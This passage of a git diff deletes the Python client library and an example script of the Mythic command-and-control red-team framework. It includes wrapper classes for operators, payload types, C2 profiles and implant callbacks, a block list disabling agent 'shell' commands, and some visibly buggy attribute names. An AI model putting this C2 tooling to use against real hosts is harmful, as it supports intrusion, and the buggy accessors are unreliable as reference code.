list", payload_types=[ - PayloadType(ptype="apfell", commands=["shell", "shell_elevated"]), - PayloadType(ptype="poseidon", commands=["shell"]) - ]) - resp = await mythic.create_disabled_commands_profile(dcp) - current_operation = (await mythic.get_current_operation_info()).response - for member in current_operation.members: - print("[*] updating block list for {}".format(member.username)) - resp = await mythic.update_disabled_commands_profile_for_operator(profile=dcp, operator=member, operation=current_operation) - - except Exception as e: - print(str(e)) - -async def analyze_file_upload_download(mythic, file): - try: - if file.total_chunks == file.chunks_received: - if file.is_download_from_agent: - print("[+] Notified of finished file download, pulling from server for offline analysis...") - contents = await mythic.download_file(file) - with open("downloaded_file", "wb") as f: - f.write(contents) - else: - print("this is an upload") - - else: - print(f"[*] Don't have full file yet: {file.chunks_received} of {file.total_chunks} so far") - except Exception as e: - print(e) - -async def main(): - await scripting() - try: - while True: - pending = asyncio.Task.all_tasks() - plist = [] - for p in pending: - if p._coro.__name__ != "main" and p._state == "PENDING": - plist.append(p) - if len(plist) == 0: - exit(0) - else: - await asyncio.gather(*plist) - except KeyboardInterrupt: - pending = asyncio.Task.all_tasks() - for t in pending: - t.cancel() - -loop = asyncio.get_event_loop() -loop.run_until_complete(main()) diff --git a/Mythic_CLI/mythic.py b/Mythic_CLI/mythic.py deleted file mode 100644 
index 994519265..000000000 --- a/Mythic_CLI/mythic.py +++ /dev/null @@ -1,5009 +0,0 @@ -import aiohttp -import asyncio -import json -import sys -from typing import Dict, List, Union -from time import time -import base64 - - -async def json_print(thing): - print(json.dumps(thing, indent=2, default=lambda o: o.to_json())) - - -async def obj_to_json(thing): - return json.loads(json.dumps(thing, default=lambda o: o.to_json())) - - -class APIToken: - def __init__( - self, - token_type: str = None, - token_value: str = None, - creation_time: str = None, - active: bool = None, - id: int = None, - operator: Union["Operator", str] = None, - ): - self._token_type = token_type - self._token_value = token_value - self._creation_time = creation_time - self._active = active - self._id = id - if isinstance(operator, Operator) or operator is None: - self._operator = operator - else: - self._operator = Operator(username=operator) - - def to_json(self): - r = {} - for k in vars(self): - if getattr(self, k) is not None: - try: - r[k[1:]] = getattr(self, k) - except: - r[k[1:]] = json.dumps( - getattr(self, k), default=lambda o: o.to_json() - ) - return r - - def __str__(self): - return json.dumps(self.to_json()) - - def __eq__(self, other): - """Overrides the default implementation""" - if isinstance(other, APIToken): - return self._token_value == other.token_value - return False - - @property - def token_type(self) -> str: - return self._token_type - - @token_type.setter - def token_type(self, token_type): - self._token_type = token_type - - @property - def token_value(self) -> str: - return self._token_value - - @token_value.setter - def token_value(self, token_value): - self._token_value = token_value - - @property - def creation_time(self) -> str: - return self._creation_time - - @creation_time.setter - def creation_time(self, creation_time): - self._creation_time = creation_time - - @property - def active(self) -> bool: - return self._active - - @active.setter - def active(self, active): - self._active = active - - @property - def id(self) -> int: - return self._id - - @id.setter - def id(self, id): - self._id = id - - @property - def operator(self) -> "Operator": - return self._operator - - @operator.setter - def operator(self, operator): - if isinstance(operator, Operator) or operator is None: - self._operator = operator - else: - self._operator = Operator(username=operator) - - -class Operation: - def __init__( - self, - name: str = None, - admin: Union["Operator", str] = None, - complete: bool = None, - AESPSK: str = None, - webhook: str = None, - id: int = None, - members: List[Union["Operator", Dict[str, str], str]] = None, - ): - self._name = name - if isinstance(admin, Operator) or admin is None: - self._admin = admin - else: - self._admin = Operator(username=admin) - self._complete = complete - self._AESPSK = AESPSK - self._webhook = webhook - self._id = id - if members is not None: - if isinstance(members, list): - self._members = [ - Operator(username=x) if isinstance(x, str) else Operator(**x) if isinstance(x, Dict) else x for x in members - ] - else: - raise ValueError("members must be a list") - else: - self._members = members - - def to_json(self): - r = {} - for k in vars(self): - if getattr(self, k) is not None: - try: - r[k[1:]] = getattr(self, k) - except: - r[k[1:]] = json.dumps( - getattr(self, k), default=lambda o: o.to_json() - ) - return r - - def __str__(self): - return json.dumps(self.to_json()) - - def __eq__(self, other): - """Overrides the default implementation""" - if 
isinstance(other, Operation): - return self._name == other.name or ( - self._id is not None and other.id is not None and self._id == other.id - ) - return False - - @property - def name(self) -> str: - return self._name - - @name.setter - def name(self, name): - self._name = name - - @property - def admin(self) -> "Operator": - return self._admin - - @admin.setter - def admin(self, admin): - if isinstance(admin, Operator) or admin is None: - self._admin = admin - else: - self._admin = Operator(username=admin) - - @property - def complete(self) -> bool: - return self._complete - - @complete.setter - def complete(self, complete): - self._complete = complete - - @property - def AESPSK(self) -> str: - return self._AESPSK - - @AESPSK.setter - def AESPSK(self, AESPSK): - self._AESPSK = AESPSK - - @property - def id(self) -> int: - return self._id - - @id.setter - def id(self, id): - self._id = id - - @property - def webhook(self) -> str: - return self._webhook - - @webhook.setter - def webhook(self, webhook): - self._webhook = webhook - - @property - def members(self) -> List["Operator"]: - return self._members - - @members.setter - def members(self, members): - if members is not None: - if isinstance(members, list): - self._members = [ - Operator(username=x) if isinstance(x, str) else Operator(**x) if isinstance(x, Dict) else x for x in members - ] - else: - raise ValueError("members must be a list") - else: - self._members = members - - -class Operator: - def __init__( - self, - username: str = None, - password: str = None, - admin: bool = None, - creation_time: str = None, - last_login: str = None, - active: bool = None, - current_operation: Union[Operation, str] = None, - current_operation_id: int = None, - ui_config: str = None, - id: int = None, - view_utc_time: bool = None, - deleted: bool = None, - view_mode: str = None, - base_disabled_commands: str = None, - ): - self._username = username - self._admin = admin - self._creation_time = creation_time - self._last_login = last_login - self._active = active - if isinstance(current_operation, Operation) or current_operation is None: - self._current_operation = current_operation - else: - self._current_operation = Operation(name=current_operation) - self._ui_config = ui_config - self._id = id - self._password = password - self._view_utc_time = view_utc_time - self._deleted = deleted - if self._current_operation is not None: - self._current_operation.id = current_operation_id - if view_mode in ["spectator", "operator", "developer", None]: - self._view_mode = view_mode - else: - raise Exception("Bad value for view_mode") - self._base_disabled_commands = base_disabled_commands - - def to_json(self): - r = {} - for k in vars(self): - if getattr(self, k) is not None: - try: - r[k[1:]] = getattr(self, k) - except: - r[k[1:]] = json.dumps( - getattr(self, k), default=lambda o: o.to_json() - ) - return r - - def __str__(self): - return json.dumps(self.to_json()) - - def __eq__(self, other): - """Overrides the default implementation""" - if isinstance(other, Operator): - return self._username == other.username or ( - self._id is not None and other.id is not None and self._id == other.id - ) - return False - - @property - def username(self) -> str: - return self._username - - @username.setter - def username(self, username): - self._username = username - - @property - def admin(self) -> bool: - return self._admin - - @admin.setter - def admin(self, admin): - self._admin = admin - - @property - def creation_time(self) -> str: - return self._creation_time 
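
Every wrapper class in the deleted Mythic_CLI/mythic.py repeats the same two conventions visible above and below this point: constructor arguments supplied as bare strings, ints, or dicts are coerced into the matching wrapper object, and to_json() publishes each populated private attribute with its leading underscore stripped (the r[k[1:]] indexing). A compact, hypothetical sketch of just that pattern, trimmed to two tiny stand-in classes so the convention is easier to see in isolation:

import json
from typing import Union

class Operator:
    # trimmed stand-in for the Operator wrapper above
    def __init__(self, username: str = None):
        self._username = username

    def to_json(self):
        # expose "_username" as "username", skipping unset attributes
        return {k[1:]: getattr(self, k) for k in vars(self) if getattr(self, k) is not None}

class Operation:
    # trimmed stand-in: "admin" may be an Operator or a bare username string
    def __init__(self, name: str = None, admin: Union[Operator, str] = None):
        self._name = name
        if isinstance(admin, Operator) or admin is None:
            self._admin = admin
        else:
            self._admin = Operator(username=admin)

    def to_json(self):
        return {k[1:]: getattr(self, k) for k in vars(self) if getattr(self, k) is not None}

op = Operation(name="test", admin="mythic_admin")
# nested objects serialize through their own to_json, mirroring json_print above
print(json.dumps(op.to_json(), indent=2, default=lambda o: o.to_json()))
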
- - @creation_time.setter - def creation_time(self, creation_time): - self._creation_time = creation_time - - @property - def last_login(self) -> str: - return self._last_login - - @last_login.setter - def last_login(self, last_login): - self._last_login = last_login - - @property - def active(self) -> bool: - return self._active - - @active.setter - def active(self, active): - self._active = active - - @property - def current_operation(self) -> Operation: - return self._current_operation - - @current_operation.setter - def current_operation(self, current_operation): - if isinstance(current_operation, Operation) or current_operation is None: - self._current_operation = current_operation - else: - self._current_operation = Operation(name=current_operation) - - @property - def ui_config(self) -> str: - return self._ui_config - - @ui_config.setter - def ui_config(self, ui_config): - self._ui_config = ui_config - - @property - def id(self) -> int: - return self._id - - @id.setter - def id(self, id): - self._id = id - - @property - def password(self) -> str: - return self._password - - @password.setter - def password(self, password): - self._password = password - - @property - def view_utc_time(self) -> bool: - return self._view_utc_time - - @view_utc_time.setter - def view_utc_time(self, view_utc_time): - self._view_utc_time = view_utc_time - - @property - def deleted(self) -> bool: - return self._deleted - - @deleted.setter - def deleted(self, deleted): - self._deleted = deleted - - @property - def view_mode(self) -> str: - return self._view_mode - - @view_mode.setter - def view_mode(self, view_mode): - if view_mode in ["spectator", "operator", "developer", None]: - self._view_mode = view_mode - else: - raise Exception("Bad value for view_mode") - - @property - def base_disabled_commands(self) -> str: - return self._base_disabled_commands - - @base_disabled_commands.setter - def base_disabled_commands(self, base_disabled_commands): - self._base_disabled_commands = base_disabled_commands - - -class PayloadType: - def __init__( - self, - ptype: str = None, - creation_time: str = None, - file_extension: str = None, - wrapper: bool = None, - wrapped: Union["PayloadType", str] = None, - supported_os: str = None, - last_heartbeat: str = None, - container_running: bool = None, - service: str = None, - author: str = None, - note: str = None, - supports_dynamic_loading: bool = None, - deleted: bool = None, - build_parameters: List[Dict] = None, - id: int = None, - c2_profiles: List[Union["C2Profile", Dict]] = None, - commands: List[Union["Command", str, Dict]] = None, - ): - self._ptype = ptype - self._creation_time = creation_time - self._file_extension = file_extension - self._wrapper = wrapper - if isinstance(wrapped, PayloadType) or wrapped is None: - self._wrapped = wrapped - else: - self._wrapped_ = PayloadType(ptype=wrapped) - self._supported_os = supported_os - self._last_heartbeat = last_heartbeat - self._container_running = container_running - self._service = service - self._id = id - self._author = author - self._note = note - self._build_parameters = build_parameters - self._supports_dynamic_loading = supports_dynamic_loading - self._deleted = deleted - if isinstance(c2_profiles, List): - self._c2_profiles = [ - C2Profile(**x) if isinstance(x, Dict) else x for x in c2_profiles - ] - else: - self._c2_profiles = c2_profiles - if isinstance(commands, List): - self._commands = [ - Command(**x) - if isinstance(x, Dict) - else Command(cmd=x) - if isinstance(x, str) - else x - for x in commands - 
] - else: - self._commands = commands - - def to_json(self): - r = {} - for k in vars(self): - if getattr(self, k) is not None: - try: - r[k[1:]] = getattr(self, k) - except: - r[k[1:]] = json.dumps( - getattr(self, k), default=lambda o: o.to_json() - ) - return r - - def __str__(self): - return json.dumps(self.to_json()) - - def __eq__(self, other): - """Overrides the default implementation""" - if isinstance(other, PayloadType): - return self._ptype == other.ptype or ( - self._id is not None and other.id is not None and self._id == other.id - ) - return False - - @property - def ptype(self) -> str: - return self._ptype - - @ptype.setter - def ptype(self, ptype): - self._ptype = ptype - - @property - def operator(self) -> Operator: - return self._operator - - @operator.setter - def operator(self, operator): - if isinstance(operator, Operator) or operator is None: - self._operator = operator - else: - self._operator = Operator(username=operator) - - @property - def creation_time(self) -> str: - return self._creation_time - - @creation_time.setter - def creation_time(self, creation_time): - self._creation_time = creation_time - - @property - def file_extension(self) -> str: - return self._file_extension - - @file_extension.setter - def file_extension(self, file_extension): - self._file_extension = file_extension - - @property - def wrapper(self) -> bool: - return self._wrapper - - @wrapper.setter - def wrapper(self, wrapper): - self._wrapper = wrapper - - @property - def wrapped(self) -> "PayloadType": - return self._wrapped - - @wrapped.setter - def wrapped(self, wrapped): - if isinstance(wrapped, PayloadType) or wrapped is None: - self._wrapped = wrapped - else: - self._wrapped_ = PayloadType(ptype=wrapped) - - @property - def supported_os(self) -> str: - return self._supported_os - - @supported_os.setter - def supported_os(self, supported_os): - self._supported_os = supported_os - - @property - def last_heartbeat(self) -> str: - return self._last_heartbeat - - @last_heartbeat.setter - def last_heartbeat(self, last_heartbeat): - self._last_heartbeat = last_heartbeat - - @property - def container_running(self) -> bool: - return self._container_running - - @container_running.setter - def container_running(self, container_running): - self._container_running = container_running - - @property - def service(self) -> str: - return self._service - - @service.setter - def service(self, service): - self._service = service - - @property - def id(self) -> int: - return self._id - - @id.setter - def id(self, id): - self._id = id - - @property - def author(self) -> str: - return self._author - - @author.setter - def author(self, author): - self._author = author - - @property - def note(self) -> str: - return self._note - - @note.setter - def note(self, note): - self._note = note - - @property - def supports_dynamic_loading(self) -> bool: - return self._supports_dynamic_loading - - @supports_dynamic_loading.setter - def supports_dynamic_loading(self, supports_dynamic_loading): - self._supports_dynamic_loading = supports_dynamic_loading - - @property - def deleted(self) -> bool: - return self._deleted - - @deleted.setter - def deleted(self, deleted): - self._deleted = deleted - - @property - def build_parameters(self) -> List[Dict]: - return self._build_parameters - - @build_parameters.setter - def build_parameters(self, build_parameters): - self._build_parameters = build_parameters - - @property - def c2_profiles(self) -> List["C2Profile"]: - return self._c2_profiles - - @c2_profiles.setter - def 
c2_profiles(self, c2_profiles): - if isinstance(c2_profiles, List): - self._c2_profiles = [ - C2Profile(**x) if isinstance(x, Dict) else x for x in c2_profiles - ] - else: - self._c2_profiles = c2_profiles - - @property - def commands(self) -> List["Command"]: - return self._commands - - @commands.setter - def commands(self, commands): - if isinstance(commands, List): - self._commands = [ - Command(**x) - if isinstance(x, Dict) - else Command(cmd=x) - if isinstance(x, str) - else x - for x in commands - ] - else: - self._commands = commands - - -class Command: - def __init__( - self, - needs_admin: bool = None, - help_cmd: str = None, - description: str = None, - cmd: str = None, - payload_type: Union[PayloadType, str] = None, - creation_time: str = None, - version: int = None, - is_exit: bool = None, - is_file_browse: bool = None, - is_process_list: bool = None, - is_download_file: bool = None, - is_remove_file: bool = None, - is_upload_file: bool = None, - author: str = None, - mythic_version: int = None, - deleted: bool = None, - id: int = None, - params: List[Union["CommandParameters", Dict[str, str]]] = None, - ): - self._needs_admin = needs_admin - self._help_cmd = help_cmd - self._description = description - self._cmd = cmd - if isinstance(payload_type, PayloadType) or payload_type is None: - self._payload_type = payload_type - else: - self._payload_type = PayloadType(ptype=payload_type) - self._creation_time = creation_time - self._version = version - self._is_exit = is_exit - self._is_file_browse = is_file_browse - self._is_process_list = is_process_list - self._is_download_file = is_download_file - self._is_remove_file = is_remove_file - self._is_upload_file = is_upload_file - self._author = author - self._delted = deleted - self._mythic_version = mythic_version - self._id = id - if params is not None and params != []: - if isinstance(params, list): - self._params = [ - CommandParameters(**x) if isinstance(x, Dict) else x for x in params - ] - else: - raise ValueError("params must be a list") - else: - self._params = None - - def to_json(self): - r = {} - for k in vars(self): - if getattr(self, k) is not None: - try: - r[k[1:]] = getattr(self, k) - except: - r[k[1:]] = json.dumps( - getattr(self, k), default=lambda o: o.to_json() - ) - return r - - def __str__(self): - return json.dumps(self.to_json()) - - def __eq__(self, other): - """Overrides the default implementation""" - if isinstance(other, Command): - return ( - self._cmd == other.cmd - and self._payload_type.ptype == other.payload_type.ptype - ) or ( - self._id is not None and other.id is not None and self._id == other.id - ) - return False - - @property - def needs_admin(self) -> bool: - return self._needs_admin - - @needs_admin.setter - def needs_admin(self, needs_admin): - self._needs_admin = needs_admin - - @property - def help_cmd(self) -> str: - return self._help_cmd - - @help_cmd.setter - def help_cmd(self, help_cmd): - self._help_cmd = help_cmd - - @property - def description(self) -> str: - return self._description - - @description.setter - def description(self, description): - self._description = description - - @property - def cmd(self) -> str: - return self._cmd - - @cmd.setter - def cmd(self, cmd): - self._cmd = cmd - - @property - def payload_type(self) -> PayloadType: - return self._payload_type - - @payload_type.setter - def payload_type(self, payload_type): - if isinstance(payload_type, PayloadType) or payload_type is None: - self._payload_type = payload_type - else: - self._payload_type = 
PayloadType(ptype=payload_type) - - @property - def creation_time(self) -> str: - return self._creation_time - - @creation_time.setter - def creation_time(self, creation_time): - self._creation_time = creation_time - - @property - def version(self) -> int: - return self._version - - @version.setter - def version(self, version): - self._version = version - - @property - def is_exit(self) -> bool: - return self._is_exit - - @is_exit.setter - def is_exit(self, is_exit): - self._is_exit = is_exit - - @property - def is_file_browse(self) -> bool: - return self._is_file_browse - - @is_file_browse.setter - def is_file_browse(self, is_file_browse): - self._is_file_browse = is_file_browse - - @property - def is_process_list(self) -> bool: - return self._is_process_list - - @is_process_list.setter - def is_process_list(self, is_process_list): - self._is_process_list = is_process_list - - @property - def is_download_file(self) -> bool: - return self._is_download_file - - @is_download_file.setter - def is_download_file(self, is_download_file): - self._is_download_file = is_download_file - - @property - def is_remove_file(self) -> bool: - return self._is_remove_file - - @is_remove_file.setter - def is_remove_file(self, is_remove_file): - self._is_remove_file = is_remove_file - - @property - def is_upload_file(self) -> bool: - return self._is_upload_file - - @is_upload_file.setter - def is_upload_file(self, is_upload_file): - self._is_upload_file = is_upload_file - - @property - def deleted(self) -> bool: - return self._deleted - - @deleted.setter - def deleted(self, deleted): - self._deleted = deleted - - @property - def author(self) -> str: - return self._author - - @author.setter - def author(self, author): - self._author = author - - @property - def mythic_version(self) -> int: - return self._mythic_version - - @mythic_version.setter - def mythic_version(self, mythic_version): - self._mythic_version = mythic_version - - @property - def id(self) -> int: - return self._id - - @id.setter - def id(self, id): - self._id = id - - @property - def params(self) -> List["CommandParameters"]: - return self._params - - @params.setter - def params(self, params): - if isinstance(params, list): - self._params = [ - CommandParameters(**x) if isinstance(x, Dict) else x for x in params - ] - elif params is None or params == []: - self._params = None - else: - raise ValueError("params must be a list") - - -class CommandParameters: - def __init__( - self, - command: Union[ - Command, int - ] = None, # database ID for the corresponding command - cmd: str = None, # cmd string the command refers to (like shell) - payload_type: Union[PayloadType, str] = None, - name: str = None, - type: str = None, - default_value: str = None, - description: str = None, - supported_agents: str = None, - choices: Union[List[str], str] = None, - required: bool = None, - id: int = None, - ): - if isinstance(command, Command) or command is None: - self._command = command - else: - self._command = Command(id=command) - self._cmd = cmd - if isinstance(payload_type, PayloadType) or payload_type is None: - self._payload_type = payload_type - else: - self._payload_type = PayloadType(ptype=payload_type) - self._name = name - self._type = type - self._description = description - self._supported_agents = supported_agents - self._default_value = default_value - if isinstance(choices, List) or choices is None: - self._choices = choices - else: - self._choices = choices.split("\n") - self._required = required - self._id = id - - def to_json(self): - r = 
{} - for k in vars(self): - if getattr(self, k) is not None: - try: - r[k[1:]] = getattr(self, k) - except: - r[k[1:]] = json.dumps( - getattr(self, k), default=lambda o: o.to_json() - ) - return r - - def __str__(self): - return json.dumps(self.to_json()) - - def __eq__(self, other): - """Overrides the default implementation""" - if isinstance(other, CommandParameters): - return ( - self._name == other.name - and (self._command == other.command) - or (self._cmd == other.cmd) - ) or ( - self._id is not None and other.id is not None and self._id == other.id - ) - return False - - @property - def command(self) -> Command: - return self._command - - @command.setter - def command(self, command): - if isinstance(command, Command) or command is None: - self._command = command - else: - self._command = Command(id=command) - - @property - def name(self) -> str: - return self._name - - @name.setter - def name(self, name): - self._name = name - - @property - def type(self) -> str: - return self._type - - @type.setter - def type(self, type): - self._type = type - - @property - def description(self) -> str: - return self._description - - @description.setter - def description(self, description): - self._description = description - - @property - def supported_agents(self) -> str: - return self._supported_agents - - @supported_agents.setter - def supported_agents(self, supported_agents): - self._supported_agents = supported_agents - - @property - def default_value(self) -> str: - return self._default_value - - @default_value.setter - def default_value(self, default_value): - self._default_value = default_value - - @property - def choices(self) -> List[str]: - return self._choices - - @choices.setter - def choices(self, choices): - if isinstance(choices, List) or choices is None: - self._choices = choices - else: - self._choices = choices.split("\n") - - @property - def required(self) -> bool: - return self._required - - @required.setter - def required(self, required): - self._required = required - - @property - def id(self) -> int: - return self._id - - @id.setter - def id(self, id): - self._id = id - - @property - def cmd(self) -> str: - return self._cmd - - @cmd.setter - def cmd(self, cmd): - self._cmd = cmd - - @property - def payload_type(self) -> PayloadType: - return self._payload_type - - @payload_type.setter - def payload_type(self, payload_type): - if isinstance(payload_type, PayloadType) or payload_type is None: - self._payload_type = payload_type - else: - self._payload_type = PayloadType(ptype=payload_type) - - -class C2Profile: - def __init__( - self, - name: str = None, - description: str = None, - creation_time: str = None, - running: bool = None, - last_heartbeat: str = None, - container_running: bool = None, - author: str = None, - is_p2p: bool = None, - is_server_routed: bool = None, - mythic_encrypts: bool = None, - deleted: bool = None, - id: int = None, - ptype: List[Union[PayloadType, str]] = None, - parameters: Dict = None, - ): # list of payload types that support this c2 profile - self._name = name - self._description = description - self._creation_time = creation_time - self._running = running - self._last_heartbeat = last_heartbeat - self._container_running = container_running - self._id = id - self._author = author - self._is_p2p = is_p2p - self._is_server_routed = is_server_routed - self._mythic_encrypts = mythic_encrypts - self._deleted = deleted - if ptype is not None: - if isinstance(ptype, list): - self._ptype = [ - PayloadType(ptype=x) if isinstance(x, str) else x for x 
in ptype - ] - else: - raise ValueError("ptype must be a list") - else: - self._ptype = ptype - self._parameters = parameters - - def to_json(self): - r = {} - for k in vars(self): - if getattr(self, k) is not None: - try: - r[k[1:]] = getattr(self, k) - except: - r[k[1:]] = json.dumps( - getattr(self, k), default=lambda o: o.to_json() - ) - return r - - def __str__(self): - return json.dumps(self.to_json()) - - def __eq__(self, other): - """Overrides the default implementation""" - if isinstance(other, C2Profile): - return self._name == other.name or ( - self._id is not None and other.id is not None and self._id == other.id - ) - return False - - @property - def name(self) -> str: - return self._name - - @name.setter - def name(self, name): - self._name = name - - @property - def description(self) -> str: - return self._description - - @description.setter - def description(self, description): - self._description = description - - @property - def creation_time(self) -> str: - return self._creation_time - - @creation_time.setter - def creation_time(self, creation_time): - self._creation_time = creation_time - - @property - def running(self) -> bool: - return self._running - - @running.setter - def running(self, running): - self._running = running - - @property - def last_heartbeat(self) -> str: - return self._last_heartbeat - - @last_heartbeat.setter - def last_heartbeat(self, last_heartbeat): - self._last_heartbeat = last_heartbeat - - @property - def container_running(self) -> bool: - return self._container_running - - @container_running.setter - def container_running(self, container_running): - self._container_running = container_running - - @property - def id(self) -> int: - return self._id - - @id.setter - def id(self, id): - self._id = id - - @property - def ptype(self) -> List[PayloadType]: - return self._ptype - - @ptype.setter - def ptype(self, ptype): - if isinstance(ptype, list): - self._ptype = [ - PayloadType(ptype=x) if isinstance(x, str) else x for x in ptype - ] - elif ptype is None: - self._ptype = ptype - else: - raise ValueError("ptype must be a list") - - @property - def author(self) -> str: - return self._author - - @author.setter - def author(self, author): - self._author = author - - @property - def is_p2p(self) -> bool: - return self._is_p2p - - @is_p2p.setter - def is_p2p(self, is_p2p): - self._is_p2p = is_p2p - - @property - def is_server_routed(self) -> bool: - return self._iis_server_routed - - @is_server_routed.setter - def is_server_routed(self, is_server_routed): - self._is_server_routed = is_server_routed - - @property - def mythic_encrypts(self) -> bool: - return self._mythic_encrypts - - @mythic_encrypts.setter - def is_server_routed(self, mythic_encrypts): - self._mythic_encrypts = mythic_encrypts - - @property - def deleted(self) -> bool: - return self._deleted - - @deleted.setter - def deleted(self, deleted): - self._deleted = deleted - @property - def parameters(self) -> Dict: - return self._parameters - - @parameters.setter - def parameters(self, parameters): - self._parameters = parameters - - -class C2ProfileParameters: - """ - This class combines C2ProfileParameters and C2ProfileParametersInstance - """ - - def __init__( - self, - c2_profile: Union[C2Profile, str] = None, - name: str = None, - default_value: any = None, - required: bool = None, - verifier_regex: str = None, - randomize: bool = None, - parameter_type: str = None, - description: str = None, - id: int = None, - value: any = None, - instance_name: str = None, - operation: 
Union[Operation, str] = None, - callback: Union["Callback", int] = None, - payload: Union["Payload", str] = None, - ): - if isinstance(c2_profile, C2Profile) or c2_profile is None: - self._c2_profile = c2_profile - else: - self._c2_profile = C2Profile(name=c2_profile) - self._name = name - self._default_value = default_value - self._required = required - self._verifier_regex = verifier_regex - self._parameter_type = parameter_type - self._description = description - self._instance_name = instance_name - self._value = value - self._randomize = randomize - self._id = id - if isinstance(payload, Payload) or payload is None: - self._payload = payload - else: - self._payload = Payload(uuid=payload) - if isinstance(operation, Operation) or operation is None: - self._operation = operation - else: - self._operation = Operation(name=operation) - if isinstance(callback, Callback) or callback is None: - self._callback = callback - else: - self._callback = Callback(id=callback) - - def to_json(self): - r = {} - for k in vars(self): - if getattr(self, k) is not None: - try: - r[k[1:]] = getattr(self, k) - except: - r[k[1:]] = json.dumps( - getattr(self, k), default=lambda o: o.to_json() - ) - return r - - def __str__(self): - return json.dumps(self.to_json()) - - def __eq__(self, other): - """Overrides the default implementation""" - if isinstance(other, C2ProfileParameters): - return self._name == other.name and self._c2_profile == other.c2_profile - return False - - @property - def c2_profile(self) -> C2Profile: - return self._c2_profile - - @c2_profile.setter - def c2_profile(self, c2_profile): - if isinstance(c2_profile, C2Profile) or c2_profile is None: - self._c2_profile = c2_profile - else: - self._c2_profile = C2Profile(name=c2_profile) - - @property - def name(self) -> str: - return self._name - - @name.setter - def name(self, name): - self._name = name - - @property - def verifier_regex(self) -> str: - return self._verifier_regex - - @verifier_regex.setter - def verifier_regex(self, verifier_regex): - self._verifier_regex = verifier_regex - - @property - def parameter_type(self) -> str: - return self._parameter_type - - @parameter_type.setter - def parameter_type(self, parameter_type): - self._parameter_type = parameter_type - - @property - def description(self) -> str: - return self._description - - @description.setter - def description(self, description): - self._description = description - - @property - def instance_name(self) -> str: - return self._instance_name - - @instance_name.setter - def instance_name(self, instance_name): - self._instance_name = instance_name - - @property - def default_value(self) -> any: - return self._default_value - - @default_value.setter - def default_value(self, default_value): - self._default_value = default_value - - @property - def required(self) -> bool: - return self._required - - @required.setter - def required(self, required): - self._required = required - - @property - def randomize(self) -> bool: - return self._randomize - - @randomize.setter - def randomize(self, randomize): - self._randomize = randomize - - @property - def id(self) -> int: - return self._id - - @id.setter - def id(self, id): - self._id = id - - @property - def value(self) -> any: - return self._value - - @value.setter - def value(self, value): - self._value = value - - @property - def payload(self) -> "Payload": - return self._payload - - @payload.setter - def payload(self, payload): - if isinstance(payload, Payload) or payload is None: - self._payload = payload - else: - 
self._payload = Payload(uuid=payload) - - @property - def operation(self) -> Operation: - return self._operation - - @operation.setter - def operation(self, operation): - if isinstance(operation, Operation) or operation is None: - self._operation = operation - else: - self._operation = Operation(name=operation) - - @property - def callback(self) -> "Callback": - return self._callback - - @callback.setter - def callback(self, callback): - if isinstance(callback, Callback) or callback is None: - self._callback = callback - else: - self._callback = Callback(id=callback) - - -class Callback: - def __init__( - self, - init_callback: str = None, - last_checkin: str = None, - user: str = None, - host: str = None, - pid: int = None, - ip: str = None, - os: str = None, - domain: str = None, - architecture: str = None, - description: str = None, - operator: Union[Operator, str] = None, - active: bool = None, - port: int = None, - socks_task: int = None, - pcallback: Union["Callback", int] = None, - registered_payload: str = None, # corresponding payload's UUID - payload_type: Union[PayloadType, str] = None, # corresponding payload's type - c2_profile: Union[C2Profile, str] = None, # corresponding payload's c2 profile - payload_description: str = None, # corresponding payload's description - integrity_level: int = None, - operation: Union[Operation, str] = None, - encryption_type: str = None, - decryption_key: str = None, - encryption_key: str = None, - locked: bool = None, - locked_operator: str = None, - tasks: List[Union["Task", Dict]] = None, - id: int = None, - agent_callback_id: str = None, - extra_info: str = None, - sleep_info: str = None, - external_ip: str = None, - payload_type_id: int = None, - supported_profiles: List[Union[C2Profile, Dict]] = None, - ): - self._init_callback = init_callback - self._last_checkin = last_checkin - self._user = user - self._host = host - self._pid = pid - self._ip = ip - self._port = port - self._socks_task = socks_task - self._domain = domain - self._description = description - self._agent_callback_id = agent_callback_id - self._external_ip = external_ip - self._payload_type_id = payload_type_id - self._locked_operator = locked_operator - self._os = os - self._architecture = architecture - if isinstance(operator, Operator) or operator is None: - self._operator = operator - else: - self._operator = Operator(username=operator) - self._active = active - if isinstance(pcallback, Callback) or pcallback is None: - self._pcallback = pcallback - elif pcallback == "null": - self._pcallback = None - else: - self._pcallback = Callback(id=pcallback) - if registered_payload is None: - self._registered_payload = registered_payload - else: - self._registered_payload = Payload(uuid=registered_payload) - if isinstance(payload_type, PayloadType) or payload_type is None: - self._payload_type = payload_type - else: - self._payload_type = PayloadType(ptype=payload_type) - if isinstance(c2_profile, C2Profile) or c2_profile is None: - self._c2_profile = c2_profile - else: - self._c2_profile = C2Profile(name=c2_profile) - self._payload_description = payload_description - self._integrity_level = integrity_level - if isinstance(operation, Operation) or operation is None: - self._operation = operation - else: - self._operation = Operation(name=operation) - self._encryption_type = encryption_type - self._decryption_key = decryption_key - self._encryption_key = encryption_key - if isinstance(tasks, List): - self._tasks = [Task(**x) if isinstance(x, Dict) else x for x in tasks] - elif 
tasks is None: - self._tasks = tasks - else: - self._tasks = [Task(**tasks) if isinstance(tasks, Dict) else tasks] - self._id = id - if supported_profiles is None: - self._supported_profiles = supported_profiles - else: - self._supported_profiles = [x if isinstance(x, C2Profile) else C2Profile(**x) for x in supported_profiles] - - def to_json(self): - r = {} - for k in vars(self): - if getattr(self, k) is not None: - try: - r[k[1:]] = getattr(self, k) - except: - r[k[1:]] = json.dumps( - getattr(self, k), default=lambda o: o.to_json() - ) - return r - - def __str__(self): - return json.dumps(self.to_json()) - - def __eq__(self, other): - """Overrides the default implementation""" - if isinstance(other, Callback): - return self._id == other.id - return False - - @property - def init_callback(self) -> str: - return self._init_callback - - @init_callback.setter - def init_callback(self, init_callback): - self._init_callback = init_callback - - @property - def last_checkin(self) -> str: - return self._last_checkin - - @last_checkin.setter - def last_checkin(self, last_checkin): - self._last_checkin = last_checkin - - @property - def user(self) -> str: - return self._user - - @user.setter - def user(self, user): - self._user = user - - @property - def host(self) -> str: - return self._host - - @host.setter - def host(self, host): - self._host = host - - @property - def pid(self) -> int: - return self._pid - - @pid.setter - def pid(self, pid): - self._pid = pid - - @property - def ip(self) -> str: - return self._ip - - @ip.setter - def ip(self, ip): - self._ip = ip - - @property - def description(self) -> str: - return self._description - - @description.setter - def description(self, description): - self._description = description - - @property - def operator(self) -> Operator: - return self._operator - - @operator.setter - def operator(self, operator): - if isinstance(operator, Operator) or operator is None: - self._operator = operator - else: - self._operator = Operator(username=operator) - - @property - def active(self) -> bool: - return self._active - - @active.setter - def active(self, active): - self._active = active - - @property - def pcallback(self) -> "Callback": - return 